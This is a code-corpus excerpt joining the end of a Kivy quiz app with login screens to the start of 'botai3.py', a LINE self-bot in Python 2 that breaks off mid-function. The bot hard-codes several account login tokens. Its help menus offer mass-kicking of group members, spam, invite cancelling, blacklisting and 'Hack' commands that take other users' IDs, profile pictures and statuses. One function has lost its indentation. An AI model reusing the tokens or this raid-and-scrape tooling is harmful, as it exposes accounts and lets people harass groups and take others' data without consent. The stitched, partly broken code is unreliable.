          read_questions() (which reads 'firebase.json') never saw updates.
        """
        url = "https://samplefirebaseapp-3de75.firebaseio.com/export.json"
        response = requests.get(url)
        data = response.json()
        # w is write mode or r is read mode
        with open(os.getcwd() + '/questions/firebase.json', 'w') as outfile:
            json.dump(data, outfile)
        print(os.getcwd())
class NextScreen(Screen):
    # Placeholder "progress" screen; presumably laid out in the .kv file.
    pass
class TaskCreator:
    """Builds quiz tasks: [question, answer, 4 shuffled options, correct-text]."""

    def __init__(self):
        self.questions = ListQuestions()

    def get_task(self, mode=1):
        """Return a 7-element task list; only mode 2 populates real content."""
        question_text = answer_text = correct_text = ""
        options = ["", "", "", ""]
        if mode == 2:
            picked = self.questions.get_question_python()
            question_text = picked.question
            answer_text = picked.answer
            options = [picked.answer, picked.option2,
                       picked.option3, picked.option4]
            correct_text = picked.correct
        # Shuffle so the right answer is not always the first button.
        random.shuffle(options)
        return [question_text, answer_text] + options + [correct_text]
class AboutScreen(Screen):
    """Static about screen."""

    def about_text(self):
        """Return the text displayed on the about page."""
        parts = ("Hi =)\n", "This is a simple project.\n")
        return "".join(parts)
class CreateAccount(Screen):
    """Sign-up screen: validates the form and stores a new user in the DB."""

    namee = ObjectProperty(None)
    email = ObjectProperty(None)
    password = ObjectProperty(None)

    def submit(self):
        """Validate all fields; on success persist the user and open the menu."""
        if self.namee.text != "" and self.email.text != "" and self.email.text.count("@") == 1 and self.email.text.count(".") > 0:
            # BUG FIX: the original tested `self.password != ""`, comparing
            # the widget object (always truthy) instead of its text, so an
            # empty password was accepted. Compare the entered text.
            if self.password.text != "":
                db.add_user(self.email.text, self.password.text, self.namee.text)
                self.reset()
                self.manager.current = "menu"
            else:
                invalidForm()
        else:
            invalidForm()

    def login(self):
        """Switch back to the login screen with cleared fields."""
        self.reset()
        self.manager.current = "login"

    def reset(self):
        """Clear all three input fields."""
        self.email.text = ""
        self.password.text = ""
        self.namee.text = ""
class StartScreen(Screen):
    # Entry/landing screen; presumably laid out in the .kv file.
    pass
class SigninWindow(Screen):
    """Login screen backed by the flat-file user database."""

    email = ObjectProperty(None)
    password = ObjectProperty(None)

    def loginBtn(self):
        """Validate the entered credentials; go to the menu on success."""
        if not db.validate(self.email.text, self.password.text):
            invalidLogin()
            return
        # Remember who is logged in so MainWindow can show their details.
        MainWindow.current = self.email.text
        self.reset()
        self.manager.current = "menu"

    def createBtn(self):
        """Switch to the account-creation screen with cleared fields."""
        self.reset()
        self.manager.current = "create"

    def reset(self):
        """Blank both input boxes."""
        for box in (self.email, self.password):
            box.text = ""
class HelpScreen(Screen):
    """Static help screen."""

    def help_text(self):
        """Return the help text shown on this screen.

        BUG FIX: the original return ended with a stray line-continuation
        backslash after the last string literal, splicing the following
        `class` statement into this expression and producing a SyntaxError.
        """
        return "Hi \n" \
               "This game will provide you some questions about General Knowledge.\n"
class Menu(Screen):
    """Main menu screen; can refresh the question bank from the server."""

    def update_game(self):
        # NOTE(review): the popup is dismissed on the very next line after
        # scheduling the update, so it likely never becomes visible — confirm
        # whether dismissal was meant to happen inside update().
        pop = Popup(title='Updating', content=Label(text='Questions been updated'), auto_dismiss=False)
        pop.open()
        Clock.schedule_once(self.update, 0)
        pop.dismiss()

    def update(self, event):
        # Clock callback: reload the question list and pull a fresh copy.
        l = ListQuestions()
        l.update()
class ActionScreen(Screen):
    """Gameplay screen: a question, four option buttons, a countdown label
    and running score/error/round counters."""

    # NOTE(review): these are class-level attributes shared by all instances;
    # the game rebinds them per instance, which is only safe while a single
    # ActionScreen exists — confirm.
    errors_made = 0
    round_number = 1
    max_rounds = 2
    count = 0
    task_values = [0, 0, 0, 0, 0, 0, 0]  # [question, answer, opt1..opt4, correct-text]
    current_mode = 1

    def new_game(self):
        # Reset all counters and show the first question.
        self.Tasks = TaskCreator()
        self.round_number = 0
        self.count = 0
        self.errors_made = 0
        self.set_next_task()

    # when it shows first question round becomes 1
    def set_next_task(self):
        # Pull a fresh task and push its pieces into the widgets.
        self.task_values = self.Tasks.get_task(self.current_mode)
        self.ids.task.text = self.task_values[0]
        self.ids.button_1.text = str(self.task_values[2])
        self.ids.button_2.text = str(self.task_values[3])
        self.ids.button_3.text = str(self.task_values[4])
        self.ids.button_4.text = str(self.task_values[5])
        # Restart the once-per-second countdown label.
        Clock.schedule_once(self.update_label, 1)
        self.ids.label_1.text = "Errors: " + str(self.errors_made)
        #self.ids.label_2.text = str(self.current_mode) + str(self.current_mode)
        self.ids.label_2.text = "Score: " + str(self.count)
        self.ids.label_3.text = str(self.round_number) + " / " + str(self.max_rounds)
        # Clear any correct/error highlighting left from the previous round.
        self.ids.button_1.background_normal = "./data/normal.png"
        self.ids.button_2.background_normal = "./data/normal.png"
        self.ids.button_3.background_normal = "./data/normal.png"
        self.ids.button_4.background_normal = "./data/normal.png"

    def update_label(self, *args):
        # Tick the counter label once per second until it reaches cut_off.
        cut_off = 20
        self.ids.label_4.text = str(int(self.ids.label_4.text) + 1)
        if int(self.ids.label_4.text) < cut_off:
            Clock.schedule_once(self.update_label, 1)

    def check_answer(self, button_pressed):
        # Correct answer: highlight green, +2 score, reset the error streak.
        if button_pressed.text == self.task_values[1]:
            button_pressed.background_normal = './data/correct.png'
            self.round_number += 1
            self.count += 2
            self.errors_made = 0
            self.ids.label_2.text = "Score :" + str(self.count)
            self.ids.label_1.text = "Errors: " + str(self.errors_made)
            self.ids.label_3.text = str(self.round_number) + " / " + str(self.max_rounds)
        # when answer is wrong it goes to else part
        else:
            self.round_number += 1
            self.ids.label_3.text = str(self.round_number) + " / " + str(self.max_rounds)
            self.ids.label_2.text = "Score :" + str(self.count)
            self.errors_made += 1
            self.ids.label_1.text = "Errors: " + str(self.errors_made)
            self.ids.task.markup = True
            # show the correct-answer text in red in the task label
            self.ids.task.text = '[color=#ff3333]' + self.task_values[6] + '[/color]'
            button_pressed.background_normal = './data/error.png'
        if self.round_number == self.max_rounds:
            self.manager.current = 'result'
        else:
            # NOTE(review): response() mutates widget properties from this
            # worker thread; Kivy expects UI changes on the main thread —
            # confirm this is safe in practice.
            t2 = threading.Thread(target=self.response)
            t2.start()

    def response(self):
        time.sleep(1)  # update widgets after specific time
        self.ids.button_1.disabled = True
        self.ids.button_2.disabled = True
        self.ids.button_3.disabled = True
        self.ids.button_4.disabled = True
        time.sleep(1)
        self.ids.button_1.disabled = False
        self.ids.button_2.disabled = False
        self.ids.button_3.disabled = False
        self.ids.button_4.disabled = False
        self.set_next_task()
class ResultScreen(Screen):
    """Shows the star rating and final score once the quiz is over."""

    def calculate_result(self, screen):
        """Map screen.errors_made to a star count and message, then display."""
        errors = screen.errors_made
        if errors <= 1:
            stars, message = 5, 'Excellent!\n\n'
        elif errors <= 2:
            stars, message = 4, 'Very good!\n\n Close to perfect. Keep up!'
        elif errors <= 4:
            stars, message = 3, 'Good!\n\n Train more!'
        elif errors <= 6:
            stars, message = 2, 'Good!\n\n Train more!'
        elif errors <= 8:
            stars, message = 1, 'Good!\n\n Train more!'
        else:
            stars, message = 0, 'Okay...\n\n Try again to get all the stars!'
        # Light up the earned stars (widgets star_1 .. star_<stars>).
        for index in range(1, stars + 1):
            self.ids['star_%d' % index].source = './data/star.png'
        self.ids.label.text = message
        self.ids.label_4.text = "Score:" + str(screen.count)
class PopUpQuit(Popup):
    # Quit-confirmation dialog; presumably laid out in the .kv file.
    pass


class SignupWindow(Screen):
    # Placeholder screen; presumably laid out in the .kv file.
    pass
def invalidLogin():
    # Modal popup shown when credentials fail validation.
    # `Label` is imported from kivy.uix.label at the top of the file.
    pop = Popup(title='Invalid Login',
                content=Label(text='Invalid username or password.'),
                size_hint=(None, None), size=(400, 400))
    pop.open()


def invalidForm():
    # Modal popup shown when the sign-up form is incomplete or invalid.
    pop = Popup(title='Invalid Form', content=Label(text='Please fill in all inputs with valid information.'),
                size_hint=(None, None), size=(400, 400))
    pop.open()


# Flat-file user store shared by the login/sign-up screens.
db = DataBase("users.txt")
class MainWindow(Screen):
    """Account-overview screen shown after a successful login."""

    n = ObjectProperty(None)
    created = ObjectProperty(None)
    email = ObjectProperty(None)
    # Email of whoever logged in last (set by SigninWindow.loginBtn).
    current = ""

    def logOut(self):
        """Return to the login screen."""
        self.manager.current = "login"

    def on_enter(self, *args):
        """Refresh the labels from the database each time the screen opens."""
        pwd, display_name, created_on = db.get_user(self.current)
        self.n.text = "Account Name: " + display_name
        self.email.text = "Email: " + self.current
        self.created.text = "Created On: " + created_on
class MainApp(MDApp):
    """Application root: owns the ScreenManager and global key handling."""

    sm = ScreenManager(transition=FadeTransition())

    def build(self):
        """Register every screen; the first one added ('login') shows first."""
        screens = (
            (SigninWindow, 'login'),
            (Menu, 'menu'),
            (ActionScreen, 'game'),
            (MainWindow, 'main'),
            (StartScreen, 'start'),
            (NextScreen, 'progress'),
            (HelpScreen, 'help'),
            (AboutScreen, 'about'),
            (ResultScreen, 'result'),
            (SignupWindow, 'signup'),
            (CreateAccount, 'create'),
        )
        for screen_cls, screen_name in screens:
            self.sm.add_widget(screen_cls(name=screen_name))
        # Bind to keyboard to make the back button under android work
        Window.bind(on_keyboard=self.handle_keyboard)
        self.title = 'GenerealKnowledgeQuiz'
        return self.sm

    def handle_keyboard(self, window, key, *largs):
        """Handle back (27) and up (273, kept for test purposes) keys:
        confirm quit while in-game, quit outright from the menu.
        Returning True consumes the event."""
        if key == 27 or key == 273:
            active = self.sm.current_screen.name
            if active == 'game':
                PopUpQuit().open()
            elif active == 'menu':
                quit()
            return True
# Script entry point: build the Kivy app and start its event loop.
if __name__ == '__main__':
    MainApp().run()
|
botai3.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EvyRA6uk6WO6OANNneCf.zsjptOGse28bSLj1PuTA7W.69J4S3XwOhfQOzyc/cz+oEZe9uGJfYCWIjHzdfhmM9o=')
cl.loginResult()
print "Cl-Login Success\n"
ki1 = LINETCR.LINE()
#ki1.login(qr=True)
ki1.login(token='Ev69mxc1xsPI0PZv3rR3.ceM9NaolFHDUaV2+G8nZyW.dIMEwUnTtabrS/gHoTpPKbYx6n8OTe3HiHY4S5d8LMM=')
ki1.loginResult()
print "Ki-Login Success\n"
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='EvkhBZPTCc1GtMyB3BV7.L9FHe7uzKTCG1RQIn1TiTW.yAaZhULyuBUQXshDpj0fBDPXGADVV+KBoYvlT5/IPWk=')
ki2.loginResult()
print "Ki2-Login Success\n"
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='EvkhBZPTCc1GtMyB3BV7.L9FHe7uzKTCG1RQIn1TiTW.yAaZhULyuBUQXshDpj0fBDPXGADVV+KBoYvlT5/IPWk=')
ki3.loginResult()
print "Ki3-Login Success\n"
ki10 = LINETCR.LINE()
#ki10.login(qr=True)
ki10.login(token='EveDBXagKElQaY3wLBT7.zHaODuDXU8bfbqzFy+szXW.NfYuKFYnbskfXDh69vYhjmP3ZDACQuw00qrTCSAHqcE=')
ki10.loginResult()
print "Ki10-Login Success\n"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔═════════════════════
║ [SELF BOT]
║ [By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ instruction set 1 ☬]
╚══════════════════
╔═════════════════════
║☬➣『me』
║☬➣『K on/off』
║☬➣『Virus』
║☬➣『ct @』
║☬➣『Key』
║☬➣『Ginfo:』
║☬➣『Mid』
║☬➣『Mid @』
║☬➣『Allmid』
║☬➣『Mc:』
║☬➣『Gift』
║☬➣『kick1 -- kick10 gift』
║☬➣『Cn: 』 naming
║☬➣『naming: 』naming clocks
║☬➣『turn on the clock/Jam on』
║☬➣『turn off the clock』
║☬➣『Group』
║☬➣『Tl: text』
║☬➣『Tx:』 create a virus name
║☬➣『Online check』
║☬➣『open pull back』
║☬➣『closed pull back』
║☬➣『open group』
║☬➣『closed group』
║☬➣『Like on』
║☬➣『Add:on/off』
║☬➣『leave on/off』
║☬➣『Share on』
║☬➣『share off』
║☬➣『Add message: text』
║☬➣『Message:』
║☬➣『comment: 』
║☬➣『com on/off』
║☬➣『com off』
║☬➣ 『time』เช็ค วัน - เวลา
║☬➣『yt 』
║☬➣『ytmp3』
║☬➣『siri:』
║☬➣『Siri-en』
║☬➣『say』
║☬➣『/say』 Kick the speaker
║☬➣ 『/ 』 sticker
║☬➣ 『R chat』REMOVCHAT
║☬➣『rejec』
║☬➣『kick1 -- kick10 rejec』
║☬➣『Log-in / ขอลิ้ง』
║☬➣『rejec invite』
║☬➣『 . 』
║☬➣『notice:』
║☬➣『creator』
║☬➣『Group creator』
║☬➣『Team』
║☬➣『Restart / รีบูต』
║☬➣『muter』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage2 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 2 ☬]
╚══════════════════
╔═════════════════════
║☬➣『mybot』
║☬➣『#mybot』
║☬➣『join』
║☬➣『out』
║☬➣『kick1--10』 kickเกอร์เข้า
║☬➣『kickall』 คำสั่งkickalll
║☬➣『 Nk: 』
║☬➣『Kill』
║☬➣『absen』
║☬➣『Cancel』
║☬➣『Open link』
║☬➣『Close link』
║☬➣『Canncel on/off』
║☬➣『ปิด เชิญ』
║☬➣『เชิญ』
║☬➣『ลิ้ง』
║☬➣『Spam on/off』
║☬➣『Gpict』
║☬➣『pull the picture』
║☬➣『Gurl』
║☬➣『Vps』
║☬➣『เชคค่า』
║☬➣『แทค』
║☬➣『เปิดหมด』
║☬➣『ปิดหมด』
║☬➣『แบน』
║☬➣『ลบแบน』
║☬➣『แบน @』
║☬➣『ลบแบน @』
║☬➣『ล้างดำ』
║☬➣『Cb』
║☬➣『Bl』
║☬➣『สั่งดำ @』
║☬➣『เปิด อ่าน』
║☬➣『ปิด อ่าน』
║☬➣『ลิสกลุ่ม』
║☬➣『Gcancel: 』
║☬➣『Gcancel on/off』
║☬➣『แปลงร่าง @』
║☬➣『mybackup』
║☬➣『kickทั้งหมด @』
║☬➣『kick1- 10 แปลงร่าง @』
║☬➣『kick คืนร่าง』
║☬➣『ตั้งเวลา』
║☬➣『.ใครอ่าน』
║☬➣『เพื่อน』
║☬➣『#เพื่อน』
║☬➣『บล็อค』
║☬➣『เปิด ล็อคชื่อ』
║☬➣『ปิด ล็อคชื่อ』
║☬➣『เปิด ป้องกัน』
║☬➣『ปิดป้องกัน』
║☬➣ 『รูป』 รูปเรา
║☬➣ 『ปก』 รูแปก เรา
║☬➣ 『โปรวีดีโอ』 วีดีโอโปร เรา
║☬➣ 『ตัส』 ตัสเรา
║☬➣ 『ลิ้งรูป』 ลิ้งรูปเรา
║☬➣ 『ลิ้งปก』 ลิ้งปกเรา
║☬➣ 『Hack @』ขโโมย คท + Mid
║☬➣ 『/รูป @』 ขโมย รูป
║☬➣ 『/ปก @』 ขโมย รูปปก
║☬➣ 『/ตัส @』 ขโมย ตัส
║☬➣ 『เชคหมด』เชครูป ปก ตัส
║☬➣『Sk』
║☬➣『Sp』
║☬➣『Bot Speed』
║☬➣『Key』
║☬➣『Qr on/off』
║☬➣『Backup on/off』
║☬➣『Protect On/off』
║☬➣『Namelock On/off』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage3 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 3 ☬]
╚══════════════════
╔═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Protact on/off
║☬➣〘Qr on/off
║☬➣〘Invit on/off〙
║☬➣〘Cancel on/off〙
╚═══════════════════
╔═══════════════════
║ ✟โหมดเรียนเเบบ✟
╠═══════════════════
║☬➣〘Mimic: on/off〙
║☬➣〘Micadd @〙
║☬➣ Micdel @〙
╠═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Contact on/off〙
║☬➣〘Autojoin on/off〙
║☬➣〘Autoleave on/off〙
║☬➣〘Autoadd on/off〙
║☬➣〘Like me〙
║☬➣〘Like friend〙
║☬➣〘Like on〙
║☬➣〘Respon on/off〙
║☬➣〘Read on/off〙
║☬➣〘Simisimi on/off〙
╠══════════════════
║ ✟ New function ✟
╠══════════════════
║☬➣〘Kalender〙
║☬➣〘tr-id 〙
║☬➣〘tr-en 〙
║☬➣〘tr-jp 〙
║☬➣〘tr-ko 〙
║☬➣〘say-id 〙
║☬➣〘say-en 〙
║☬➣〘say-jp 〙
║☬〘say-ko 〙
║☬➣〘profileig 〙
║☬➣〘checkdate 〙
╚══════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
╔════════════════════
║ ✦เปิด/ปิดข้อความต้อนรับ✦
╠════════════════════
║☬Hhx1 on ➠เปิดต้อนรับ
║☬Hhx1 off ➠ปิดต้อนรับ
║☬Hhx2 on ➠เปิดออกกลุ่ม
║☬Hhx2 off ➠ปิดออกกลุ่ม
║☬Hhx3 on ➠เปิดsayถึงคนลบ
║☬Hhx3 off ➠ปิดsayถึงคนลบ
║☬Mbot on ➠เปิดเเจ้งเตือน
║☬Mbot off ➠ปิดเเจ้งเตือน
║☬M on ➠เปิดเเจ้งเตือนตนเอง
║☬M off ➠ปิดเเจ้งเตือนตนเอง
║☬Tag on ➠เปิดกล่าวถึงเเท็ค
║☬Tag off ➠ปิดกล่าวถึงเเท็ค
║☬Kicktag on ➠เปิดเตะคนเเท็ค
║☬Kicktag off ➠ปิดเตะคนเเท็ค
╚═════════════════════
╔═════════════════════
║ ✦โหมดตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1˓: ➠ไส่ข้อความต้อนรับ
║☬Hhx2˓: ➠ไส่ข้อความออกจากกลุ่ม
║☬Hhx3˓: ➠ไส่ข้อความเมื่อมีคนลบ
║☬Tag1: ➠ใส่ข้อความแทค
║☬Tag2: ➠ ใส่ข้อความแทค
╚═════════════════════
╔═════════════════════
║ ✦โหมดเช็คตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1 ➠เช็คข้อความต้อนรับ
║☬Hhx2 ➠เช็คข้อความคนออก
║☬Hhx3 ➠เช็คข้อความคนลบ
║☬Tag1 ➠เช็ตข้อความแทค
║☬Tag2 ➠เช็คข้อความแทค
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
KAC=[cl,ki1,ki2,ki3]
mid = cl.getProfile().mid
Amid1 = ki1.getProfile().mid
Amid2 = ki2.getProfile().mid
Amid3 = ki3.getProfile().mid
#Amid4 = ki4.getProfile().mid
#Amid5 = ki5.getProfile().mid
#Amid6 = ki6.getProfile().mid
#Amid7 = ki7.getProfile().mid
#Amid8 = ki8.getProfile().mid
#Amid9 = ki9.getProfile().mid
Amid10 = ki10.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
mid = cl.getProfile().mid
Bots = ["",mid]
self = ["",mid]
admin = ""
admsa = ""
owner = ""
adminMID = ""
Creator=""
wait = {
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':True,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"[ตอบรับ อัตโนมัติ]\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nhttp://line.me/ti/p/arif.mh",
"lang":"JP",
"commentOn":True,
"comment1":"""
[ AOTO LIKE ]
[ SELF BOT ]
[ รับติดตั้ง เชลmybot ราคาประหยัด ]
[By.☬ARIFISTIFIK☬]
http://line.me/ti/p/arif.mh
─██─███─███─██─██─██▄█
─██─▀██▄██▀─▀█▄█▀─██▀█
▄██▄▄█▀▀▀─────▀──▄██▄▄█
[ DRAGON PLAY ]
http://line.me/ti/p/arif.mh
""",
"acommentOn":True,
"bcommentOn":True,
"ccommentOn":True,
"Protectcancl":False,
"pautoJoin":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"likeOn":True,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"ainvite":False,
"binvite":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"Hhx1":False,
"Hhx2":False,
"Hhx3":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":True,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag1":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"tag2":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"posts":True,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki2.getProfile()
backup = ki2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = ki3.getProfile()
#backup = ki3.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki4.getProfile()
#backup = ki4.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki5.getProfile()
#backup = ki5.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki6.getProfile()
#backup = ki6.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki7.getProfile()
#backup = ki7.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki8.getProfile()
#backup = ki8.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki9.getProfile()
#backup = ki9.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki10.getProfile()
#backup = ki10.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
    """Re-exec the current script in place, replacing this process."""
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
def sendImageWithUrl(self, to_, url):
    """Download the image at *url* to a temp file and send it to *to_*.

    Raises Exception when the download fails; re-raises any send error.
    """
    # BUG FIX: `randint` was called without being imported; qualify it with
    # the `random` module, which this file does import.
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        # BUG FIX: the file was opened in text mode ('w') and copied with the
        # never-imported `shutil`; stream the raw bytes in binary mode.
        with open(path, 'wb') as f:
            for chunk in r.iter_content(1024):
                f.write(chunk)
    else:
        raise Exception('Download image failure.')
    try:
        self.sendImage(to_, path)
    except Exception as e:
        raise e
def yt(query):
    """Search YouTube for *query* and return a list of youtu.be links."""
    with requests.session() as s:
        links = []
        if query == "":
            query = "S1B tanysyz"
        s.headers['user-agent'] = 'Mozilla/5.0'
        r = s.get('http://www.youtube.com/results',
                  params={'search_query': query})
        soup = BeautifulSoup(r.content, 'html5lib')
        # Keep plain watch links only; skip playlist results.
        for anchor in soup.select('.yt-lockup-title > a[title]'):
            href = anchor['href']
            if '&list=' not in href and 'watch?v' in href:
                links.append('youtu.be' + href.replace('watch?v=', ''))
        return links
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
    """Collect every image URL in *page* via _images_get_next_item."""
    items = []
    while True:
        item, offset = _images_get_next_item(page)
        if item == "no_links":
            break
        items.append(item)
        # Timer could be used to slow down the request for image downloads
        time.sleep(0.1)
        # Continue scanning after the link we just consumed.
        page = page[offset:]
    return items
def upload_tempimage(client):
    '''
    Upload a picture of a kitten. We don't ship one, so get creative!
    '''
    # NOTE(review): `album` and `image_path` are not defined anywhere in this
    # file — presumably module-level globals set elsewhere; confirm before
    # calling, otherwise this raises NameError.
    config = {
        'album': album,
        'name': 'bot auto upload',
        'title': 'bot auto upload',
        'description': 'bot auto upload'
    }
    print("Uploading image... ")
    image = client.upload_from_path(image_path, config=config, anon=False)
    print("Done")
    # NOTE(review): under Python 2 (this file uses print statements) a bare
    # print() outputs "()"; probably intended as a blank line.
    print()
def summon(to, nama):
    """Send one message that @-mentions every user mid in *nama*.

    The visible text is built from raw UTF-8 byte escapes (box-drawing
    characters); each "@x" line is a placeholder the client replaces
    with the mentioned user's display name via the MENTION metadata.
    The offsets (start=14, +2/+6/+4 steps) track the byte positions of
    each placeholder inside the text — presumably hand-tuned to the
    border characters' UTF-8 widths; confirm before changing.
    """
    mention_json = ""
    body = ""
    start = 14
    end = 14
    for member in nama:
        end = end + 2
        mention_json += ('{"S":' + json.dumps(str(start)) +
                        ',"E":' + json.dumps(str(end)) +
                        ',"M":' + json.dumps(member) + '},')
        start = start + 6
        end = end + 4
        body += "\xe2\x95\xa0 @x \n"
    # Drop the trailing comma from the JSON fragment list.
    mention_json = mention_json[:len(mention_json) - 1]
    msg = Message()
    msg.to = to
    msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n" + body + "\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
    msg.contentMetadata = {'MENTION': '{"MENTIONEES":[' + mention_json + ']}', 'EMTVER': '4'}
    print("[Command] Tag All")
    try:
        cl.sendMessage(msg)
    except Exception as error:
        print(error)
def waktu(secs):
    """Format a duration in seconds as Thai 'days hours minutes seconds'."""
    minutes, seconds = divmod(secs, 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    return '%02d วัน %02d ชั่วโมง %02d นาที %02d วินาที' % (days, hours, minutes, seconds)
def cms(string, commands):
    """Return True when *string* exactly equals one of *commands*.

    Bug fixed: the original looped over a 13-element prefix list
    (``tex``) but never used the loop variable, so the identical
    equality scan ran 13 times. Observable behavior (exact match only)
    is unchanged.
    """
    # NOTE(review): the unused prefix list ("+", "@", "/", ">", ";", "^",
    # "%", "$", "サテラ:") suggests prefix matching (texX + command) was
    # intended — confirm before enabling that behavior.
    return any(string == command for command in commands)
def sendMessage(self, messageObject):
    """Forward a prepared Message object through the Talk client.

    The leading 0 is presumably a request sequence number expected by
    the client API — TODO confirm against the Talk client signature.
    """
    return self.Talk.client.sendMessage(0, messageObject)
def sendText(self, Tomid, text):
    """Build a plain-text Message addressed to *Tomid* and send it."""
    message = Message()
    message.to = Tomid
    message.text = text
    return self.Talk.client.sendMessage(0, message)
def sendImage(self, to_, path):
    """Send the image file at *path* to the target *to_*.

    First registers an empty image message (contentType=1) to obtain a
    message object id, then uploads the file bytes to the LINE OBS
    endpoint keyed by that id.

    Fixes: the file was previously opened twice and never closed
    (handle leak), and its size was obtained by reading the whole file
    into memory; it is now opened once in a with-block and sized via
    os.path.getsize.

    Raises Exception when the upload does not return HTTP 201.
    """
    M = Message(to=to_, text=None, contentType=1)
    M.contentMetadata = None
    M.contentPreview = None
    M_id = self._client.sendMessage(0, M).id
    params = {
        'name': 'media',
        'oid': M_id,
